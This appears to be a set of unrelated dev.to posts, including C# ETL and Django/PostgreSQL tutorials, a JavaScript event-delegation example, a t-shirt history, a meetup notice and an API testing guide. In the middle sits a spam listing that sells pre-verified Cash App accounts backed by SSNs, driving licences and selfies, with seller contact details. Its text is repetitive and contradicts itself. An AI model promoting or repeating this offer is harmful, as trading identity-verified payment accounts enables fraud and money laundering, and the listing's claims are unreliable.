ensure any existing table with the same name is dropped to start fresh. This step is handled by the `DropTableTask.DropIfExists` method. ```csharp DropTableTask.DropIfExists(connMan, "Test"); CreateTableTask.CreateIfNotExists(connMan, def); ``` - **Insert Sample Data** Populate the `Test` table with sample data using SQL INSERT statements. ```csharp SqlTask.ExecuteNonQuery(connMan, "INSERT INTO Test VALUES('2022-01-01',100)"); SqlTask.ExecuteNonQuery(connMan, "INSERT INTO Test VALUES('2022-01-02',350)"); SqlTask.ExecuteNonQuery(connMan, "INSERT INTO Test VALUES('2022-01-03',470)"); SqlTask.ExecuteNonQuery(connMan, "INSERT INTO Test VALUES('2022-01-04',134)"); SqlTask.ExecuteNonQuery(connMan, "INSERT INTO Test VALUES('2022-01-05',42)"); ``` - **Execute the code** After executing the code, check your SQL Server database (`demo` in this example) to verify that the `Test` table has been created and populated with the sample data. ## Loading Data using an ETL Pipeline Let's see how to load data from a SQL Server database into memory and analyze it using DataFrames in a polyglot notebook environment. - **Setup Environment** Ensure you have the necessary libraries installed and configured. We are using ETLBox for ETL operations, including data extraction from SQL Server, and Microsoft's DataFrame for data analysis. ```C# #r "nuget:ETLBox, 3.4.0" #r "nuget:ETLBox.SqlServer, 3.4.0" #r "nuget:ETLBox.Analysis, 3.4.0" using ETLBox; using ETLBox.ControlFlow; using ETLBox.SqlServer; using ETLBox.DataFlow; using ETLBox.Analysis; ``` - **Loading Data from Database** Initialize the connection manager and define a `DbSource` to extract data from the `Test` table in our SQL Server database. ```csharp //The connMan was already defined in a previous step! //IConnectionManager connMan = new SqlConnectionManager("Data Source=localhost;User Id=sa;Password=YourStrong@Passw0rd;Initial Catalog=demo;TrustServerCertificate=true;"); var source = new DbSource(connMan, "Test"); ``` - **Transforming Data** Use a `RowTransformation` to manipulate the data in memory. In this example, we multiply the `YValue` column by 1000. ```csharp var row = new RowTransformation(row => { dynamic r = row as dynamic; r.YValue = r.YValue * 1000; return row; }); ``` - **Multicasting Data** Utilize a `Multicast` component to split the data flow into two branches: - One branch feeds data into a `MemoryDestination`, storing data in a C# List (`memDest.Data`). - The other branch stores data into a `DataFrameDestination`, creating a DataFrame (`dfDest.DataFrame`) for further analysis. ```csharp var multicast = new Multicast(); var memDest = new MemoryDestination(); var dfDest = new DataFrameDestination(); multicast.OnProgress = pc => Console.WriteLine($"Records loaded from database: {pc}"); ``` - **Running the Pipeline** Until now, we've defined our pipeline components. Now, let's link them together and trigger the data flow. ```csharp source.LinkTo(row); row.LinkTo(multicast); multicast.LinkTo(memDest); multicast.LinkTo(dfDest); Network.Execute(source); ``` - **Accessing Loaded Data** We stored the data loaded into the `MemoryDestination` (`memDest.Data`) and the DataFrame from `DataFrameDestination` (`dfDest.DataFrame`) for further analysis and manipulation in variables in our notebook. ```csharp var data = memDest.Data; // This is a List<object[]> var df = dfDest.DataFrame; // This is a Microsoft.Analysis.DataFrame object ``` ## Displaying and Analyzing Data Let's see how we can display and analyze the data loaded into tjhe polyglot notebook. ### Displaying the DataFrame To begin with, let's display the contents of the DataFrame (`df`). This DataFrame contains the transformed data from our ETL pipeline. ```csharp // Displaying the DataFrame df ``` We will get an output like this: index|Id|XValue|YValue -----|--|------|------ 0|1|2022-01-01 00:00:00Z|100000 1|2|2022-01-02 00:00:00Z|350000 2|3|2022-01-03 00:00:00Z|470000 3|4|2022-01-04 00:00:00Z|134000 4|5|2022-01-05 00:00:00Z|42000 ### Transforming the DataFrame We can perform additional transformations directly on the DataFrame. In this example, we'll create a new column `x` by doubling the values in the `YValue` column. ```csharp // Transforming the DataFrame df["x"] = df["YValue"] * 2; df ``` Now our output becomes this: index|Id|XValue|YValue -----|--|------|------ 0|1|2022-01-01 00:00:00Z|100000|200000 1|2|2022-01-02 00:00:00Z|350000|700000 2|3|2022-01-03 00:00:00Z|470000|940000 3|4|2022-01-04 00:00:00Z|134000|268000 4|5|2022-01-05 00:00:00Z|42000|84000 The `Microsoft.Analysis.DataFrame` is highly effective as an in-memory structure for data analysis and querying. You can learn more about it here in the Microsft Documentation: [Getting started with DataFrames]("https://learn.microsoft.com/en-us/dotnet/machine-learning/how-to-guides/getting-started-dataframe") ### Visualizing Data with ScottPlot Next, we'll visualize the loaded data using ScottPlot, [a plotting library for .NET.](https://scottplot.net/quickstart/notebook/) ```csharp #r "nuget:ScottPlot, 4.1.69" using Microsoft.DotNet.Interactive.Formatting; // Setup a custom formatter to display plots as images Formatter.Register(typeof(ScottPlot.Plot), (plot, writer) => writer.Write(((ScottPlot.Plot)plot).GetImageHtml()), HtmlFormatter.MimeType); var plt = new ScottPlot.Plot(600, 400); // Extract data from memDest.Data for plotting var dataX = memDest.Data.Select(row => (DateTime)(row as dynamic).XValue) .Select(dt => dt.ToOADate()).ToArray(); var dataY = memDest.Data.Select(row => (double)(row as dynamic).YValue).ToArray(); // Add scatter plot to ScottPlot plt.XAxis.DateTimeFormat(true); // Enable DateTime formatting on X-axis if applicable plt.AddScatter(dataX, dataY); plt ``` This will print out our data as a plot: ![Scottplot Output](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xca1idpaybbb4pdkeqi7.jpg) ## Final Thoughts Using C# in polyglot notebooks allows data professionals to work without needing to learn a new programming language. Polyglot notebooks enable users to use their existing knowledge about C# and the .NET framework in one environment, enhanced by the power of Jupyter notebooks. By default, loading data using existing data frameworks only support loading basic files (like CSV). This makes the inclusion of ETL processes in notebooks essential for managing more complex data tasks. [ETLBox, tailored for C#, stands out as the best framework designed specifically for this purpose.](https://www.etlbox.net/?utm_source=devto&utm_content=polyglot) Together, C#, Polyglot notebooks and ETLBox simplify data processing, supporting data professional to work more efficiently and make better decisions based on their data. ### Code on Github The notebook code for this example [is available on GitHub for further exploration and contribution.](https://github.com/etlbox/etlbox.demo/blob/main/Polyglot/ExampleNotebook.ipynb)
andreaslennartz
1,909,083
Event Delegation
Funny Example Alright, let's use a funny example with a classroom and students. Imagine a...
0
2024-07-02T15:37:42
https://dev.to/__khojiakbar__/event-delegation-1f8
event, delegation, javascript
## Funny Example Alright, let's use a funny example with a classroom and students. Imagine a classroom full of students, and each student is holding a card. When you tap a student's card, they say something funny. Instead of going to each student and asking them to say something funny when tapped, you tell the teacher to watch over all the students and handle it. Here's how it works with event delegation: 1. The Students and the Teacher: - The students are the items you want to interact with. - The teacher is the parent element that listens for the tap (click) on any student's card. 2. The Plan: - You tell the teacher, "Hey, whenever someone taps a student's card, let's make that student say something funny!" Now, let's see this in JavaScript: ``` <!DOCTYPE html> <html> <head> <title>Event Delegation Classroom</title> </head> <body> <div id="classroom"> <div class="student" style="background-color: yellow;">🧑‍🎓</div> <div class="student" style="background-color: orange;">🧑‍🎓</div> <div class="student" style="background-color: pink;">🧑‍🎓</div> </div> <script> // The teacher (parent) const classroom = document.getElementById('classroom'); // Add an event listener to the teacher classroom.addEventListener('click', function(event) { // Check if the clicked element is a student if (event.target.classList.contains('student')) { alert('Student says: "Why was the math book sad? It had too many problems!"'); } }); </script> </body> </html> ``` So, event delegation is like having a teacher who handles all the funny jokes for the students, making it easier and more efficient!
__khojiakbar__
1,909,082
Start of Coding
I made a website with react, I just started today, I need to post this, so I can get better. The...
0
2024-07-02T15:36:19
https://dev.to/ad31aid/start-of-coding-d20
I made a website with react, I just started today, I need to post this, so I can get better. The website is quite shit, but it will get better! https://seven1personalsite.onrender.com
ad31aid
1,909,081
The Tee: A History of Comfort, Rebellion, and Self-Expression
It started life as a practical undergarment in the late 19th century, then evolved into a symbol of...
0
2024-07-02T15:35:06
https://dev.to/pegance_teevibe_7cd8c4acb/the-tee-a-history-of-comfort-rebellion-and-self-expression-4eh
tshirt, mens, womenstshirt, online
It started life as a practical undergarment in the late 19th century, then evolved into a symbol of casualness and self-expression. Early versions were basic tees made from wool or cotton, worn for warmth and sweat absorption. The U.S. Navy adopted a similar design in the 1890s, solidifying its association with practicality. The 20th century saw the [t-shirt's](https://pegance.com/collections/) rise to casual wear. Returning soldiers from World War I preferred the comfort of their undershirts, and cheaper cotton made them more accessible. Hollywood further boosted the t-shirt's coolness factor with actors like Marlon Brando sporting them on screen. Rock and roll cemented this connection, with musicians like Elvis Presley making t-shirts a symbol of rebellion and individuality. The invention of screen printing in the 1930s opened a new era. T-shirts became a canvas for self-expression, adorned with everything from political slogans to band logos. College students were at the forefront, using them to showcase school spirit or social causes. The 70s and 80s saw designer brands enter the game, offering high-quality materials and bold logos. New fabrics like polyester also emerged, making t-shirts more suitable for active lifestyles. Today, the men's t-shirt offers a perfect blend of comfort and style. We have a wide range of fabrics, from classic cotton to performance blends, and various styles to choose from. Graphic tees remain popular, while plain ones are wardrobe essentials. T-shirts transcend mere clothing. They represent casualness, self-expression, and even rebellion. They've been used for social causes, promoting bands and sports teams, and even launching political campaigns. Their presence in iconic photos and films solidifies their place in pop culture history. The future of the t-shirt is likely to involve even more innovation. Sustainable fabrics and advancements in technology could make them even more comfortable and functional. One thing's for certain: the t-shirt's ability to adapt ensures its continued relevance in the ever-changing world of fashion.
pegance_teevibe_7cd8c4acb
1,909,080
Buy verified cash app account
https://dmhelpshop.com/product/buy-verified-cash-app-account/ Buy verified cash app account Cash...
0
2024-07-02T15:32:59
https://dev.to/nebise5872/buy-verified-cash-app-account-2410
webdev, javascript, beginners, programming
ERROR: type should be string, got "https://dmhelpshop.com/product/buy-verified-cash-app-account/\n![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/emqtbh4umve9ad9im5ep.png)\n\n\n\nBuy verified cash app account\nCash app has emerged as a dominant force in the realm of mobile banking within the USA, offering unparalleled convenience for digital money transfers, deposits, and trading. As the foremost provider of fully verified cash app accounts, we take pride in our ability to deliver accounts with substantial limits. Bitcoin enablement, and an unmatched level of security.\n\nOur commitment to facilitating seamless transactions and enabling digital currency trades has garnered significant acclaim, as evidenced by the overwhelming response from our satisfied clientele. Those seeking buy verified cash app account with 100% legitimate documentation and unrestricted access need look no further. Get in touch with us promptly to acquire your verified cash app account and take advantage of all the benefits it has to offer.\n\nWhy dmhelpshop is the best place to buy USA cash app accounts?\nIt’s crucial to stay informed about any updates to the platform you’re using. If an update has been released, it’s important to explore alternative options. Contact the platform’s support team to inquire about the status of the cash app service.\n\nClearly communicate your requirements and inquire whether they can meet your needs and provide the buy verified cash app account promptly. If they assure you that they can fulfill your requirements within the specified timeframe, proceed with the verification process using the required documents.\n\nOur account verification process includes the submission of the following documents: [List of specific documents required for verification].\n\nGenuine and activated email verified\nRegistered phone number (USA)\nSelfie verified\nSSN (social security number) verified\nDriving license\nBTC enable or not enable (BTC enable best)\n100% replacement guaranteed\n100% customer satisfaction\nWhen it comes to staying on top of the latest platform updates, it’s crucial to act fast and ensure you’re positioned in the best possible place. If you’re considering a switch, reaching out to the right contacts and inquiring about the status of the buy verified cash app account service update is essential.\n\nClearly communicate your requirements and gauge their commitment to fulfilling them promptly. Once you’ve confirmed their capability, proceed with the verification process using genuine and activated email verification, a registered USA phone number, selfie verification, social security number (SSN) verification, and a valid driving license.\n\nAdditionally, assessing whether BTC enablement is available is advisable, buy verified cash app account, with a preference for this feature. It’s important to note that a 100% replacement guarantee and ensuring 100% customer satisfaction are essential benchmarks in this process.\n\nHow to use the Cash Card to make purchases?\nTo activate your Cash Card, open the Cash App on your compatible device, locate the Cash Card icon at the bottom of the screen, and tap on it. Then select “Activate Cash Card” and proceed to scan the QR code on your card. Alternatively, you can manually enter the CVV and expiration date. How To Buy Verified Cash App Accounts.\n\nAfter submitting your information, including your registered number, expiration date, and CVV code, you can start making payments by conveniently tapping your card on a contactless-enabled payment terminal. Consider obtaining a buy verified Cash App account for seamless transactions, especially for business purposes. Buy verified cash app account.\n\nWhy we suggest to unchanged the Cash App account username?\nTo activate your Cash Card, open the Cash App on your compatible device, locate the Cash Card icon at the bottom of the screen, and tap on it. Then select “Activate Cash Card” and proceed to scan the QR code on your card.\n\nAlternatively, you can manually enter the CVV and expiration date. After submitting your information, including your registered number, expiration date, and CVV code, you can start making payments by conveniently tapping your card on a contactless-enabled payment terminal. Consider obtaining a verified Cash App account for seamless transactions, especially for business purposes. Buy verified cash app account. Purchase Verified Cash App Accounts.\n\nSelecting a username in an app usually comes with the understanding that it cannot be easily changed within the app’s settings or options. This deliberate control is in place to uphold consistency and minimize potential user confusion, especially for those who have added you as a contact using your username. In addition, purchasing a Cash App account with verified genuine documents already linked to the account ensures a reliable and secure transaction experience.\n\n \n\nBuy verified cash app accounts quickly and easily for all your financial needs.\nAs the user base of our platform continues to grow, the significance of verified accounts cannot be overstated for both businesses and individuals seeking to leverage its full range of features. How To Buy Verified Cash App Accounts.\n\nFor entrepreneurs, freelancers, and investors alike, a verified cash app account opens the door to sending, receiving, and withdrawing substantial amounts of money, offering unparalleled convenience and flexibility. Whether you’re conducting business or managing personal finances, the benefits of a verified account are clear, providing a secure and efficient means to transact and manage funds at scale.\n\nWhen it comes to the rising trend of purchasing buy verified cash app account, it’s crucial to tread carefully and opt for reputable providers to steer clear of potential scams and fraudulent activities. How To Buy Verified Cash App Accounts.  With numerous providers offering this service at competitive prices, it is paramount to be diligent in selecting a trusted source.\n\nThis article serves as a comprehensive guide, equipping you with the essential knowledge to navigate the process of procuring buy verified cash app account, ensuring that you are well-informed before making any purchasing decisions. Understanding the fundamentals is key, and by following this guide, you’ll be empowered to make informed choices with confidence.\n\n \n\nIs it safe to buy Cash App Verified Accounts?\nCash App, being a prominent peer-to-peer mobile payment application, is widely utilized by numerous individuals for their transactions. However, concerns regarding its safety have arisen, particularly pertaining to the purchase of “verified” accounts through Cash App. This raises questions about the security of Cash App’s verification process.\n\nUnfortunately, the answer is negative, as buying such verified accounts entails risks and is deemed unsafe. Therefore, it is crucial for everyone to exercise caution and be aware of potential vulnerabilities when using Cash App. How To Buy Verified Cash App Accounts.\n\nCash App has emerged as a widely embraced platform for purchasing Instagram Followers using PayPal, catering to a diverse range of users. This convenient application permits individuals possessing a PayPal account to procure authenticated Instagram Followers.\n\nLeveraging the Cash App, users can either opt to procure followers for a predetermined quantity or exercise patience until their account accrues a substantial follower count, subsequently making a bulk purchase. Although the Cash App provides this service, it is crucial to discern between genuine and counterfeit items. If you find yourself in search of counterfeit products such as a Rolex, a Louis Vuitton item, or a Louis Vuitton bag, there are two viable approaches to consider.\n\n \n\nWhy you need to buy verified Cash App accounts personal or business?\nThe Cash App is a versatile digital wallet enabling seamless money transfers among its users. However, it presents a concern as it facilitates transfer to both verified and unverified individuals.\n\nTo address this, the Cash App offers the option to become a verified user, which unlocks a range of advantages. Verified users can enjoy perks such as express payment, immediate issue resolution, and a generous interest-free period of up to two weeks. With its user-friendly interface and enhanced capabilities, the Cash App caters to the needs of a wide audience, ensuring convenient and secure digital transactions for all.\n\nIf you’re a business person seeking additional funds to expand your business, we have a solution for you. Payroll management can often be a challenging task, regardless of whether you’re a small family-run business or a large corporation. How To Buy Verified Cash App Accounts.\n\nImproper payment practices can lead to potential issues with your employees, as they could report you to the government. However, worry not, as we offer a reliable and efficient way to ensure proper payroll management, avoiding any potential complications. Our services provide you with the funds you need without compromising your reputation or legal standing. With our assistance, you can focus on growing your business while maintaining a professional and compliant relationship with your employees. Purchase Verified Cash App Accounts.\n\nA Cash App has emerged as a leading peer-to-peer payment method, catering to a wide range of users. With its seamless functionality, individuals can effortlessly send and receive cash in a matter of seconds, bypassing the need for a traditional bank account or social security number. Buy verified cash app account.\n\nThis accessibility makes it particularly appealing to millennials, addressing a common challenge they face in accessing physical currency. As a result, ACash App has established itself as a preferred choice among diverse audiences, enabling swift and hassle-free transactions for everyone. Purchase Verified Cash App Accounts.\n\n \n\nHow to verify Cash App accounts\nTo ensure the verification of your Cash App account, it is essential to securely store all your required documents in your account. This process includes accurately supplying your date of birth and verifying the US or UK phone number linked to your Cash App account.\n\nAs part of the verification process, you will be asked to submit accurate personal details such as your date of birth, the last four digits of your SSN, and your email address. If additional information is requested by the Cash App community to validate your account, be prepared to provide it promptly. Upon successful verification, you will gain full access to managing your account balance, as well as sending and receiving funds seamlessly. Buy verified cash app account.\n\n \n\nHow cash used for international transaction?\nExperience the seamless convenience of this innovative platform that simplifies money transfers to the level of sending a text message. It effortlessly connects users within the familiar confines of their respective currency regions, primarily in the United States and the United Kingdom.\n\nNo matter if you’re a freelancer seeking to diversify your clientele or a small business eager to enhance market presence, this solution caters to your financial needs efficiently and securely. Embrace a world of unlimited possibilities while staying connected to your currency domain. Buy verified cash app account.\n\nUnderstanding the currency capabilities of your selected payment application is essential in today’s digital landscape, where versatile financial tools are increasingly sought after. In this era of rapid technological advancements, being well-informed about platforms such as Cash App is crucial.\n\nAs we progress into the digital age, the significance of keeping abreast of such services becomes more pronounced, emphasizing the necessity of staying updated with the evolving financial trends and options available. Buy verified cash app account.\n\nOffers and advantage to buy cash app accounts cheap?\nWith Cash App, the possibilities are endless, offering numerous advantages in online marketing, cryptocurrency trading, and mobile banking while ensuring high security. As a top creator of Cash App accounts, our team possesses unparalleled expertise in navigating the platform.\n\nWe deliver accounts with maximum security and unwavering loyalty at competitive prices unmatched by other agencies. Rest assured, you can trust our services without hesitation, as we prioritize your peace of mind and satisfaction above all else.\n\nEnhance your business operations effortlessly by utilizing the Cash App e-wallet for seamless payment processing, money transfers, and various other essential tasks. Amidst a myriad of transaction platforms in existence today, the Cash App e-wallet stands out as a premier choice, offering users a multitude of functions to streamline their financial activities effectively. Buy verified cash app account.\n\nTrustbizs.com stands by the Cash App’s superiority and recommends acquiring your Cash App accounts from this trusted source to optimize your business potential.\n\nHow Customizable are the Payment Options on Cash App for Businesses?\nDiscover the flexible payment options available to businesses on Cash App, enabling a range of customization features to streamline transactions. Business users have the ability to adjust transaction amounts, incorporate tipping options, and leverage robust reporting tools for enhanced financial management.\n\nExplore trustbizs.com to acquire verified Cash App accounts with LD backup at a competitive price, ensuring a secure and efficient payment solution for your business needs. Buy verified cash app account.\n\nDiscover Cash App, an innovative platform ideal for small business owners and entrepreneurs aiming to simplify their financial operations. With its intuitive interface, Cash App empowers businesses to seamlessly receive payments and effectively oversee their finances. Emphasizing customization, this app accommodates a variety of business requirements and preferences, making it a versatile tool for all.\n\nWhere To Buy Verified Cash App Accounts\nWhen considering purchasing a verified Cash App account, it is imperative to carefully scrutinize the seller’s pricing and payment methods. Look for pricing that aligns with the market value, ensuring transparency and legitimacy. Buy verified cash app account.\n\nEqually important is the need to opt for sellers who provide secure payment channels to safeguard your financial data. Trust your intuition; skepticism towards deals that appear overly advantageous or sellers who raise red flags is warranted. It is always wise to prioritize caution and explore alternative avenues if uncertainties arise.\n\nThe Importance Of Verified Cash App Accounts\nIn today’s digital age, the significance of verified Cash App accounts cannot be overstated, as they serve as a cornerstone for secure and trustworthy online transactions.\n\nBy acquiring verified Cash App accounts, users not only establish credibility but also instill the confidence required to participate in financial endeavors with peace of mind, thus solidifying its status as an indispensable asset for individuals navigating the digital marketplace.\n\nWhen considering purchasing a verified Cash App account, it is imperative to carefully scrutinize the seller’s pricing and payment methods. Look for pricing that aligns with the market value, ensuring transparency and legitimacy. Buy verified cash app account.\n\nEqually important is the need to opt for sellers who provide secure payment channels to safeguard your financial data. Trust your intuition; skepticism towards deals that appear overly advantageous or sellers who raise red flags is warranted. It is always wise to prioritize caution and explore alternative avenues if uncertainties arise.\n\nConclusion\nEnhance your online financial transactions with verified Cash App accounts, a secure and convenient option for all individuals. By purchasing these accounts, you can access exclusive features, benefit from higher transaction limits, and enjoy enhanced protection against fraudulent activities. Streamline your financial interactions and experience peace of mind knowing your transactions are secure and efficient with verified Cash App accounts.\n\nChoose a trusted provider when acquiring accounts to guarantee legitimacy and reliability. In an era where Cash App is increasingly favored for financial transactions, possessing a verified account offers users peace of mind and ease in managing their finances. Make informed decisions to safeguard your financial assets and streamline your personal transactions effectively.\n\nContact Us / 24 Hours Reply\nTelegram:dmhelpshop\nWhatsApp: +1 ‪(980) 277-2786\nSkype:dmhelpshop\nEmail:dmhelpshop@gmail.com\n\n"
nebise5872
1,908,282
Working with Databases in Django Using PostgreSQL
Introduction Django simplifies database interaction with its Object-Relational Mapping...
0
2024-07-02T15:29:07
https://dev.to/kihuni/working-with-databases-in-django-using-postgresql-9co
webdev, beginners, python, devops
# Introduction Django simplifies database interaction with its Object-Relational Mapping (ORM) system, enabling Python code to be used for working with databases instead of writing SQL. This guide provides essential information on using PostgreSQL in Django, from database setup to performing CRUD operations. ## Setting Up the Database ### Database Configuration - Installing PostgreSQL: Ensure that PostgreSQL is installed on your system. If you're new to Postgres, here's a guide to help you get started: [Getting Started with PostgreSQL](https://www.postgresqltutorial.com/postgresql-getting-started/). - Installing psycopg2: Install the PostgreSQL adapter for Python. ```python pip install psycopg2-binary ``` - Configure your database settings in the settings.py file. ```python DATABASES = { 'default': { 'ENGINE': 'django.db.backends.postgresql', 'NAME': 'mydatabase', 'USER': 'mydatabaseuser', 'PASSWORD': 'mypassword', 'HOST': 'localhost', 'PORT': '5432', } } ``` ## Defining Models ### Creating a Model A model in Django is a Python class that subclasses `django.db.models.Model` and defines fields and behaviors of the data you're storing. For example: ```python from django.db import models class Author(models.Model): name = models.CharField(max_length=100) birth_date = models.DateField() ``` ### Fields Field Types: Django provides various field types to map Python types to PostgreSQL columns. - CharField: Stores text data with a maximum length. - IntegerField: Stores integer values. - DateField: Stores dates. - ForeignKey: Defines a many-to-one relationship. ### Meta Class The Meta class inside a model contains metadata options. Example: ```python class Author(models.Model): name = models.CharField(max_length=100) birth_date = models.DateField() class Meta: ordering = ['name'] ``` - ordering: Orders query results by the specified fields. ## Migrating the Database - Create Migrations: Generate migration files based on your models. ``` python manage.py makemigrations ``` - Apply Migrations: Apply the migration files to update your database schema. ``` python manage.py migrate ``` ## CRUD Operations ### Creating Records - Using the ORM: Create new records by instantiating a model and calling the save() method. ``` # python manage.py shell from postgress_database.models import Author author = Author(name='John Doe', birth_date='1980-01-01') author.save() ``` ### Reading Records QuerySet API: Retrieve records using methods like `all()`, `filter()`, `get()`, etc. Example: ``` authors = Author.objects.all() author = Author.objects.get(id=1) filtered_authors = Author.objects.filter(name__icontains='john') ``` ### Updating Records - Modifying and Saving: Update records by modifying model instances and calling save(). ``` author = Author.objects.get(id=1) author.name = 'Jane Doe' author.save() ``` ### Deleting Records Delete Method: Remove records using the delete() method. ``` author = Author.objects.get(id=1) author.delete() ``` ## QuerySet Methods ### Common Methods - all(): Returns all records. ``` authors = Author.objects.all() ``` - filter(): Returns records matching the given criteria. ``` filtered_authors = Author.objects.filter(name__icontains='john') ``` - exclude(): Excludes records matching the given criteria. ``` non_john_authors = Author.objects.exclude(name__icontains='john') ``` - order_by(): Orders records by the specified field. ``` ordered_authors = Author.objects.order_by('name') ``` - values(): Returns a QuerySet of dictionaries instead of model instances. ``` author_values = Author.objects.values('name', 'birth_date') ``` ## Relationships ### One-to-Many Relationships - ForeignKey: Define a many-to-one relationship using [ForeignKey](https://docs.djangoproject.com/en/5.0/topics/db/examples/many_to_one/) ``` class Book(models.Model): title = models.CharField(max_length=200) author = models.ForeignKey(Author, on_delete=models.CASCADE) ``` ### Many-to-Many Relationships - ManyToManyField: Define a [many-to-many relationship](https://docs.djangoproject.com/en/5.0/topics/db/examples/many_to_many/). ``` class Publisher(models.Model): name = models.CharField(max_length=100) class Book(models.Model): title = models.CharField(max_length=200) authors = models.ManyToManyField(Author) publisher = models.ForeignKey(Publisher, on_delete=models.CASCADE) ``` ### One-to-One Relationships - OneToOneField: Define a [one-to-one relationship](https://docs.djangoproject.com/en/5.0/topics/db/examples/one_to_one/). ``` class Profile(models.Model): user = models.OneToOneField(User, on_delete=models.CASCADE) bio = models.TextField() ``` ## Conclusion Working with databases in Django involves understanding how to configure your database, define models, and perform CRUD operations efficiently. Using PostgreSQL with Django's ORM simplifies these tasks, allowing you to write Python code instead of SQL queries. This guide provides a foundational understanding.
kihuni
1,909,067
July 3: Virtual AI, Machine Learning and Computer Vision Meetup
Don’t forget to join us this Wed on July 3 for the monthly AI, Machine Learning and Computer Vision...
0
2024-07-02T15:21:36
https://dev.to/voxel51/july-3-virtual-ai-machine-learning-and-computer-vision-meetup-3i51
computervision, ai, machinelearning, datascience
Don’t forget to join us this Wed on July 3 for the monthly AI, Machine Learning and Computer Vision Meetup! **Register for the Zoom**: [https://voxel51.com/computer-vision-events/ai-machine-learning-computer-vision-meetup-july-3-2024/](https://voxel51.com/computer-vision-events/ai-machine-learning-computer-vision-meetup-july-3-2024/) ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/l2e0juoai3dtm9yoc73n.gif) We have a great lineup of speakers including: * **Performance Optimization for Multimodal LLMs** - [Neha Sharma](https://www.linkedin.com/in/hashux/) from Ori Industries * **Deep Dive: Responsible and Unbiased GenAI for Computer Vision** - [Daniel Gural](https://www.linkedin.com/in/daniel-gural/) at Voxel51 * **5 Handy Ways to Use Embeddings, the Swiss Army Knife of AI** - [Harpreet Sahota](https://www.linkedin.com/in/harpreetsahota204/) at Voxel51
jguerrero-voxel51
1,909,066
API Test Automation: A Comprehensive Guide
Introduction Application Programming Interfaces (APIs) are the backbone of modern software...
0
2024-07-02T15:18:35
https://dev.to/keploy/api-test-automation-a-comprehensive-guide-59c5
api, javascript, ai, productivity
![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/gnqg2tr1qkzyxup3mnda.png) Introduction Application Programming Interfaces (APIs) are the backbone of modern software architectures. They enable different software systems to communicate with each other, facilitating the seamless integration of services and the exchange of data. As the reliance on APIs increases, ensuring their reliability, performance, and security becomes paramount. This is where API test automation comes into play. This article delves into the importance of [API test automation](https://keploy.io/blog/community/mastering-api-test-automation-best-practices-and-tools), its benefits, best practices, and tools to help you get started. What is API Test Automation? API test automation involves using automated tools to test APIs, ensuring they function as expected, meet performance standards, and are secure. Unlike manual testing, which can be time-consuming and error-prone, automated testing allows for the execution of repetitive tests efficiently and consistently. Why is API Test Automation Important? 1. Efficiency and Speed: Automated tests can be executed quickly, allowing for more tests to be run in less time compared to manual testing. 2. Consistency and Accuracy: Automation reduces human error, ensuring consistent and accurate test results. 3. Early Bug Detection: Automated tests can be integrated into the development pipeline, enabling early detection of bugs and issues, which can be fixed before they become critical problems. 4. Regression Testing: Automated tests are ideal for regression testing, ensuring that new changes do not break existing functionality. 5. Scalability: Automated testing can handle complex test scenarios and large datasets, making it scalable as the API grows. Key Components of API Test Automation 1. Test Planning: Define the scope, objectives, and criteria for API testing. Identify the APIs to be tested and the types of tests to be performed (e.g., functional, performance, security). 2. Test Design: Design test cases based on the API specifications. This includes defining input parameters, expected outcomes, and handling edge cases. 3. Test Implementation: Develop automated test scripts using appropriate tools and frameworks. Ensure scripts are modular, reusable, and maintainable. 4. Test Execution: Run automated tests regularly, ideally as part of the continuous integration/continuous deployment (CI/CD) pipeline. 5. Test Reporting: Generate detailed test reports to provide insights into test results, coverage, and detected issues. 6. Test Maintenance: Regularly update test scripts to accommodate changes in the API and ensure continued relevance and accuracy. Types of API Tests 1. Functional Testing: Validates the functionality of the API endpoints to ensure they return the correct responses for given inputs. 2. Performance Testing: Assesses the API's performance under various conditions, including load testing, stress testing, and scalability testing. 3. Security Testing: Evaluates the API's security mechanisms, including authentication, authorization, encryption, and vulnerability assessments. 4. Integration Testing: Ensures the API integrates seamlessly with other components and systems. 5. Validation Testing: Verifies the API's compliance with specifications and standards. Best Practices for API Test Automation 1. Use a Reliable Testing Framework: Choose a robust testing framework that supports your requirements and integrates well with your development environment. 2. Adopt a Test-First Approach: Implement test-driven development (TDD) or behavior-driven development (BDD) practices to write tests before the API implementation. 3. Leverage Mocking and Stubbing: Use mock servers and stubs to simulate API responses for isolated testing. 4. Maintain a Clear Test Strategy: Define clear objectives, scope, and criteria for your API tests. Prioritize critical endpoints and scenarios. 5. Ensure Data-Driven Testing: Utilize data-driven testing techniques to validate API behavior with different data sets and edge cases. 6. Automate Test Execution: Integrate automated tests into your CI/CD pipeline for continuous testing and immediate feedback. 7. Monitor API Changes: Keep track of API changes and update your test scripts accordingly to maintain accuracy. 8. Focus on Reusability and Maintainability: Write modular and reusable test scripts to reduce redundancy and simplify maintenance. 9. Generate Comprehensive Reports: Create detailed test reports to analyze results, track coverage, and identify areas for improvement. 10. Regularly Review and Refactor Tests: Periodically review and refactor your test scripts to enhance performance and address any technical debt. Popular Tools for API Test Automation 1. Postman: A versatile tool for API development and testing, Postman offers features like automated testing, mocking, and monitoring. It supports scripting with JavaScript and integrates well with CI/CD pipelines. 2. SoapUI: An open-source tool specifically designed for API testing, SoapUI supports functional, performance, and security testing for SOAP and REST APIs. Its user-friendly interface makes it accessible to both developers and testers. 3. RestAssured: A Java-based library for testing RESTful APIs, RestAssured simplifies the process of writing test scripts with its intuitive syntax and support for BDD. 4. JMeter: Primarily a performance testing tool, JMeter can also be used for functional API testing. It supports various protocols, making it suitable for different types of APIs. 5. Karate: An open-source framework that combines API testing and BDD, Karate allows for writing easy-to-understand test scripts using Gherkin syntax. It supports both HTTP and HTTPS protocols. 6. Newman: The command-line companion for Postman, Newman enables running Postman collections and scripts in CI/CD pipelines, facilitating automated testing and reporting. 7. Tavern: A Python-based API testing tool, Tavern is designed for validating RESTful APIs and MQTT-based APIs. It integrates well with Pytest, providing a robust testing environment. Challenges in API Test Automation 1. Complex Test Data Management: Managing and maintaining test data can be challenging, especially for complex APIs with multiple dependencies. 2. Handling Dynamic Responses: APIs often return dynamic data, making it difficult to validate responses accurately. 3. Maintaining Test Scripts: Keeping test scripts up-to-date with API changes requires constant effort and coordination with the development team. 4. Testing Third-Party APIs: Testing third-party APIs can be challenging due to limited control and documentation. 5. Ensuring Security and Privacy: Ensuring sensitive data is handled securely during testing is crucial to prevent data breaches and privacy violations. Conclusion API test automation is a critical component of modern software development, ensuring the reliability, performance, and security of APIs. By adopting best practices, leveraging the right 